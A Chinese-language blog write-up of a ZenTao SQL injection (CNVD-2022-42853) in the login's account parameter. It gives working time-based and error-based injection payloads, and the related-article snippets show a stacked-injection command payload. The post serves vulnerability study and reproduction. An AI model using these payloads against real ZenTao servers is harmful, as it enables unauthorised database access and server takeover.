禅道V16.5SQL注入漏洞(CNVD-2022-42853)

最新推荐文章于 2026-04-06 02:15:15 发布
原创 最新推荐文章于 2026-04-06 02:15:15 发布 · 1.1k 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#漏洞分析 #web安全 #代码审计
禅道项目管理软件存在SQL注入漏洞,影响多个版本,包括企业版6.5、旗舰版3.0和开源版16.5。攻击者可利用未过滤的account参数执行恶意SQL,获取敏感信息。漏洞主要出现在setVision()函数,允许通过GET或POST方式注入。提供了一种报错注入的payload示例。

禅道V16.5SQL注入漏洞(CNVD-2022-42853)

一、简介

禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。在登录处未对用户输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行,攻击者可利用漏洞获取数据库敏感信息。

复现码源下载:https://www.zentao.net/dynamic/zentaopms16.0.beta1-80443.html

参考:https://github.com/ce-automne/CNVD-2022-42853

二、影响范围

禅道企业版 6.5
禅道旗舰版 3.0
禅道开源版 16.5
禅道开源版 16.5.beta1

三、漏洞分析

利用网上公开的报错注入poc,发现漏洞点

在这里插入图片描述

具体函数为**setVision()**

对输入的用户名没有任何过滤就直接传入SQL语句中执行

在这里插入图片描述

而且$account变量支持$_GET$_POST两种方法传参,可以在前台sql注入

paylad

延时:
http://ip:port/index.php?account=admin' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))a)-- b

报错(POST传入)
POST /zentao/user-login.html HTTP/1.1
payload:account=admin'+and++updatexml(1,concat(0x1,user()),1)+and+'1'='1

注入成功

cat(0x1,user()),1)+and+‘1’='1


注入成功

![在这里插入图片描述](https://img-blog.csdnimg.cn/3ebfd9658d7d4907a5109729460f9955.png)
SQL注入漏洞原理分析
06-21
SQL注入漏洞原理分析
11.6 zentao/api-getModel-api-sql-sql 存在SQL注入漏洞
nnn2188185的博客
04-13 1177
11.6 zentao/api-getModel-api-sql-sql 版本中对用户接口调用权限过滤不完善,导致调用接口存在SQL注入漏洞
项目管理系统RCE漏洞复现+利用
热门推荐
0xSec
02-01 2万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
RCE漏洞修复指南:从漏洞原理到安全升级的全流程解析
最新发布
weixin_33734785的博客
04-06 366
本文详细解析了RCE漏洞的原理及修复方案,涵盖漏洞影响范围、版本升级步骤、临时缓解措施及修复效果验证。针对命令执行漏洞,提供了从基础验证到企业级深度检测的全流程解决方案,并给出安全加固建议,帮助企业有效防范反弹shell等攻击。
从信息泄露到权限后台
三天不打上房揭瓦的博客
04-29 996
声明:文中涉及到的技术和工具,仅供学习使用,禁止从事任何非法活动,如因此造成的直接或间接损失,均由使用者自行承担责任。
16.5 SQL注入(CNVD-2022-42853)
qq_59975439的博客
11-26 4937
16.5 SQL注入(CNVD-2022-42853)
sql注入合集
Aiwin的博客
05-08 1270
sql注入合集,持续收集。
sql注入合集_sql注入
2501_90424690的博客
02-03 541
sqlmap跑一下。
【组件攻击链】项目管理系统(ZenTaoPMS)高危漏洞分析与利用
further_eye的博客
12-21 5491
近年来漏洞频发,从2018年开始,每年都会爆出比较严重的高危漏洞,通过这些高危漏洞均可对服务器造成一定的影响,甚至可以获取服务器的最高权限。
百易云资产管理系统admin.ticket.close.php存在SQL注入
swordheart的博客
05-23 332
百易云资产管理系统在admin.ticket.close.php接口下存在sql注入
项目管理系统存在远程命令执行漏洞(RCE)
nnn2188185的博客
04-14 4732
是第一款国产的开源项目管理软件,也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于项目管理系统权限认证存在缺陷导致,攻击者可利用该漏洞在未授权的情况下,通过权限绕过在服务器执行任意命令。
pymssql中执行sql sever为什么会乱码_免登陆SQL注入漏洞复现
weixin_39645249的博客
12-12 286
一、漏洞简介该漏洞影响版本为8.2--9.2.1,项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,未对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取w...
SQL注入到RCE漏洞
若有战,召必回
02-12 1187
同样通过上述堆叠注入注入zt_queue执行whoami的payload的sql注入:INSERT+INTO+zt_queue(type,command,cron,createdDate,execId)+value(‘system’,‘whoami’,30,CURRENT_TIME(),123);没有对$_POST过滤,循环遍历获取参数和参数值,其中参数当作key,参数值当作value,分别传入setting模块model.php(settingModel类)的setItem方法。
linux一键安装漏洞,免登陆SQL注入漏洞复现
weixin_39552768的博客
05-17 1544
一、漏洞简介该漏洞影响版本为8.2--9.2.1,项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,未对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取webshe...
项目管理系统 身份验证漏洞分析QVD-2024-15263
shelter1234567的博客
05-03 2134
最近不怎么更新了!向小伙伴说明下 我不是什么组织 更不什么经销号(尽管csdn有很多经销广告号)一确实是下岗了!忙着为找工作而发愁。简历都投出去如同石沉大海能不愁吗!.......二是忙着论文及材料的事....三是也看了最近的漏洞,感觉也没啥可分析的 一眼就看出问题所在。有什么可分析的呢!就像医生看看患者如同看萝卜白菜一样.....,那分析反序列化链呢,这也没什么意思啊!话说到此,今儿个就推荐你看这篇文章。有一定难度挑战度,内容还是跟以前一样,以一个挖洞者的视角来讲解分析
Web安全漏洞原理——SQL注入
changyu233的博客
04-17 3549
Web安全漏洞原理——SQL注入 SQL注入 原理 ​ 由于程序员对插入SQL语句的用户输入参数检查不严格,导致的恶意SQL命令被插入语句并执行。 ​ 例如: ​ 原始查询语句为 select * from user where id=$value ​ $value为用户输入变量,由于没有过滤,在用户输入 1 and 1=2时 ​ 查询语句变为 select * from user where id=1 and 1=2,返回永假页面。 SQL数据库重要信息 MySQL数据库 默认数据库: ​ i
SQL注入到Getshell:记一次系统的渗透
dengzhasong7076的博客
03-08 1696
此过程为某站点的渗透记录,过程一波三折,但归根结底都是粗心大意造成的,不过自我认为在这个排坑的过程中也学习到了很多。 目前确认8.2 - 9.2.1存在问题 确认版本 首先可以通过接口来确认一下当前的版本。 http://example.com/index.php?mode=getconfig SQL注入分析 网上之前有过一个9.1.2的orderBy函数的分析,但是没想到9.2....
无胁科技-TVD每日漏洞情报-2022-6-16
wuthreat无胁科技的博客
06-16 574
漏洞名称:Windows Hyper-V 远程执行代码漏洞 漏洞级别:无 漏洞编号:CVE-2022-30163;CNNVD-202206-1223 相关涉及:Microsoft Hyper-V 漏洞状态:无 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-12092漏洞名称:Windows 轻量级目录访问协议 (LDAP) 远程代码执行漏洞 漏洞级别:无 漏洞编号:CVE-2022-30139;CNNVD-202206-1288 相关涉
11.6版本 后台漏洞 复现和审计
weixin_45427650的博客
04-04 3963
文章目录查看版本漏洞sql注入任意文件读取rce 11.6版本下载地址 本次复现环境windows 先搞清楚参数的传递方式,进入index.php慢慢看 先发现了这个语句: 这个导致的查看版本信息的漏洞 跟进看一下 查看版本漏洞 复现payload:http://ip/zentao/index.php?mode=getconfig 跟进exportConfig() 文件位置:zentao\framework\router.class.php 调用父类的exportConfig()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值